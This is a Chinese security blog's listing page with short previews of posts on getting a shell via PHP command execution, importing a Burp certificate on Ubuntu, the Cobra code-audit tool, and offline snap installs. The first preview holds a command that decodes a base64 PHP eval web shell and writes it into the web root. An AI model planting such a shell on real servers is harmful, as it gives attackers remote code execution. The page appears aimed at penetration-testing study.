51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

开源软件

记php命令执行写shell

记php命令执行写shell

厉飞雨 阅读(321) 评论(0) 赞(13)

<h2>php代码执行&amp;命令执行</h2> <h3>getshell</h3> <pre><code>echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d &gt; /var/www/html/shell.php <p&...

ubuntu导入burp证书抓包https

ubuntu导入burp证书抓包https

厉飞雨 阅读(292) 评论(0) 赞(14)

<p>1、打开burp挂上代理访问,浏览器访问http://burp/点击右上角CA Certificate下载证书<br /> 2、安装certutil,<strong>sudo apt-get install libnss3-tools</strong><br /> 3、burp导出der证书,把后缀改名crt&l...

ubuntu下的源代码安全审计工具Cobra

ubuntu下的源代码安全审计工具Cobra

厉飞雨 阅读(386) 评论(0) 赞(15)

<h1>前言</h1> <p>昨天考了个360众测(没过)。实战题全是业务题,源码审计就有好几个,奈何不会php把我卡的死死的。就做了一半时间就没了,总结起来就是太菜了。<br /> 于是乎想来学习一下代码审计,由于我用的是ubuntu系统,所以就用cobra吧。</p> <h1>介绍</h1>...

ubuntu 离线安装本地的snap包

ubuntu 离线安装本地的snap包

厉飞雨 阅读(349) 评论(0) 赞(14)

<h1>前言</h1> <p>直接使用snap安装慢的一批,所以下载snap包到本地离线安装。</p> <h1>命令</h1> <pre><code>sudo snap install xxx.snap --dangerous </code></pre>